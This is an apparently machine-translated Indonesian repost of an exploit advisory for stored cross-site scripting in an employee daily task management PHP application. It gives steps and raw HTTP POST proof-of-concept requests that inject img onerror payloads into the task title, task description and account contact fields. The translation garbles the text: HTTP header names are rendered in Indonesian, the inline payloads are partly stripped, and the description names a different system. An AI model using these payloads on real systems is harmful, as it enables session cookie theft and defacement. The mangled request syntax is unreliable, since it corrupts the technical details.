Sistem Manajemen Tugas Harian Karyawan 1.0 Cross Site Scripting

  • Whatsapp
Sistem Manajemen Tugas Harian Karyawan 1.0 Cross Site Scripting
Sistem Manajemen Tugas Harian Karyawan Cross Site Scripting

News.nextcloud.asia

# Judul Eksploitasi: Sistem Manajemen Tugas Harian Karyawan 1.0 – ‘multiple’ Cross Site Scripting (XSS)
# Eksploitasi Penulis: mampu403
# Tanggal: 08/12/2021
# Beranda Vendor: https://www.sourcecoster.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
# Tautan Perangkat Lunak: https://www.sourcecoster.com/sites/default/files/download/oretnom23/edtms.zip
# Versi: 1.0
# Diuji pada: windows 10
# Halaman rentan: ?page=view_task&id=2

Deskripsi teknis:

Sistem pemesanan dan reservasi acara online XSS yang tersimpan. Penyerang dapat memanfaatkan kerentanan ini untuk menjalankan javascript atas nama peselancar server web, yang dapat menyebabkan pencurian cookie, perusakan wajah, dan banyak lagi.

xss-1:

1) Navigasikan ke http://localhost/?page=view_task&id=2 dan denting “edit tugas”
2) Masukkan payload Anda di parameter parameter “judul” dan “Deskripsi Tugas”
3) Klik simpan

Bukti konsep (Poc):

Payload berikut akan memungkinkan Anda untuk menjalankan javascript –

“>


POST /Actions.php?a=save_task HTTP/1.1

Tuan rumah: localhost

Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

Terima: aplikasi/json, teks/javascript, */*; q=0,01

Terima-Bahasa: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Terima-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; rangkaian karakter = UTF-8

X-Diminta-Dengan: XMLHttpRequest

Konten-Panjang: 312

Asal: http://localhost

Koneksi: tutup

Perujuk: http://localhost/?page=tasks

Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl

id=2&title=Tugas+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EIni+adalah+tugas+untuk+ kamu.%3C%2Fp%3E%3Cp%3EIni+deskripsi+telah+telah+diperbarui%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B %26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E

xss-2

1) Navigasikan ke http://localhost.com/?page=manage_account
2) Masukkan payload Anda di parameter parameter “nama lengkap” atau “kontak” atau “email”

Bukti konsep (Poc):

Payload berikut akan memungkinkan Anda untuk menjalankan javascript –

“>

POST /Actions.php?a=update_credentials_employee HTTP/1.1

Tuan rumah: localhost

Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

Terima: aplikasi/json, teks/javascript, */*; q=0,01

Terima-Bahasa: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Terima-Encoding: gzip, deflate

X-Diminta-Dengan: XMLHttpRequest

Content-Type: multipart/form-data; batas=—————————27882107026209045483167935384

Konten-Panjang: 1613

Asal: http://localhost

Koneksi: tutup

Perujuk: http://localhost/?page=manage_account

Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama = “id”

1

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama = “nama lengkap”

John D Smith

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama = “jenis kelamin”

Pria

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”dob”

1997-06-23

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”kontak”

098123456789″>

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”email”

[email protected]

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama = “alamat”

Contoh Alamat

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”departemen_id”

1

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”email”

[email protected]

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama = “kata sandi”

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”old_password”

—————————– 27882107026209045483167935384

Isi-Disposisi: formulir-data; nama=”avatar”; nama file=””

Tipe-Konten: aplikasi/aliran oktet

—————————– 27882107026209045483167935384–

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.